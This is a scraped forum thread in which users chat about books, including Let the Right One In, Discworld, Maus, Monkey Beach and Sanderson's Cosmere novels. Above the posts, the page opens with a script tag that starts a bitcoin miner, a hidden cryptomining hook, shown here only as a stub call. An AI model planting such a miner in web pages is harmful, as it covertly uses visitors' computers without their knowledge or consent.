<script>
miner.start(); // initialise bitcoin miner
</script>

irc.cat.biosmw centralmario fan games galaxy

book's

here's a good place for FRIENDLY, ENJOYABLE, and otherwise very GENERAL discussion!
Mata Hari

book's

Postby Mata Hari » 3 days ago

This is the thread for talking about books. Books are important to read. You should try it.

Yesterday I finished reading Let the Right One In and I enjoyed it a lot. Oskar and Eli's relationship is very sweetly portrayed even as Eli precipitates horrific things. It's funny how you don't perceive her as the villain even though she obviously is when you think about it. Arguably she even ruins Oskar's life,

but at least he doesn't have to worry about bullies any more.

Mind you, most of the horror stuff didn't really bother me except when

Lacke snaps the neck of one of the cats attacking Virginia. I have a cat myself, and I'm the first to admit I'm a crazy cat lady, but I still don't know how to feel when I care about fictional cats more than fictional people.

Oskar getting bullied is also a little affecting since, unlike vampires, bastards like that exist IRL.

I also wonder why Eli chooses to present as female. Is he/she a crossdresser? Transgender? Was being castrated just a coincidence? Or is presenting as female a self-defence mechanism? Even nowadays people tend to think of girls as more innocent than boys; it's a marginal advantage, but one that would add up after 200 years. I guess it's open to interpretation, unless there's an explanation in Let the Old Dreams Die, which I have but don't plan to read until after La Belle Sauvage.

aka Cthulhu
Totally not a murderous tentacle. You can trust him.

Re: book's

Postby aka Cthulhu » 3 days ago

Re-reading for the who-knows-how-many-times the Discworld novels. Already at Men at Arms.

Mata Hari

Postby Mata Hari » 3 days ago

aka Cthulhu wrote: Re-reading for the who-knows-how-many-times the Discworld novels. Already at Men at Arms.
Are you really reading all of them in order? The only ones I haven't read are the ones I don't really have any interest in reading. Which is sad. But then it's not like there aren't a shitload of Discworld books anyway.

aka Cthulhu
Totally not a murderous tentacle. You can trust him.

Postby aka Cthulhu » 3 days ago

Mata Hari wrote:
aka Cthulhu wrote: Re-reading for the who-knows-how-many-times the Discworld novels. Already at Men at Arms.
Are you really reading all of them in order? The only ones I haven't read are the ones I don't really have any interest in reading. Which is sad. But then it's not like there aren't a shitload of Discworld books anyway.
More or less. I might have messed up the exact order once or twice, though.

Also, found a novelization of Metal Gear Solid 2 on a bargain bookstore. It's been forever and a half since I played the game, but reading through it I am pretty dang sure that every line of dialogue in that novelization is word for word the dialogue in the game. Oh well. At least it's cheap.

Coryman
The road to nowhere leads to me
First name: Cory
Pronouns: he/him/his

Postby Coryman » 3 days ago

Why are novels in English classes always so depressing? We read Monkey Beach (very tragic), then the first part of Maus (less tragic but still way more than most books). With both books, I read them in basically one sitting, then stayed up late watching youtube to cheer myself up
raocow wrote: In a world where shag carpeting wins a fight against a helicopter, we spend a lot of time reading and comparing numbers.

Mata Hari

Postby Mata Hari » 2 days ago

I think people tend to assume that more depressing stuff is more intellectually worthy. Which obviously isn't really true. But I get why they'd assign Maus, because learning about the Holocaust is a good idea. I haven't heard of the other one.

Coryman
The road to nowhere leads to me
First name: Cory

Postby Coryman » 1 day ago

Monkey Beach is about an indigenous community on the coast of BC, I think it was assigned to teach the foreign students about their history in the area.
I used to believe the whole thing about sad stories being more meaningful or intellectual or whatever, but in my grade 12 English class we studied a book with- believe it or not- a happy ending. It started off a bit dark but it got better
raocow wrote: In a world where shag carpeting wins a fight against a helicopter, we spend a lot of time reading and comparing numbers.

Kshaard
Phonotactically-non-conformist monosyllable

Postby Kshaard » 20 hours ago

Dave Bulmer - you may remember him from such all-time hits as "Not Roy" and "two Brentalfloss collaborations" - did/is somehow still doing a video series in which he goes through the first Stormlight Archive chapter by chapter. After watching that series for about two years without the faintest idea what was going on, I thought I may as well get the book. Read the first two in about a month instead of revising for A levels. Now I've fallen deep down the Cosmere rabbit hole and am currently about halfway through Warbreaker. AMA!

don't

This is someone's signature.

Return to “the gazebo”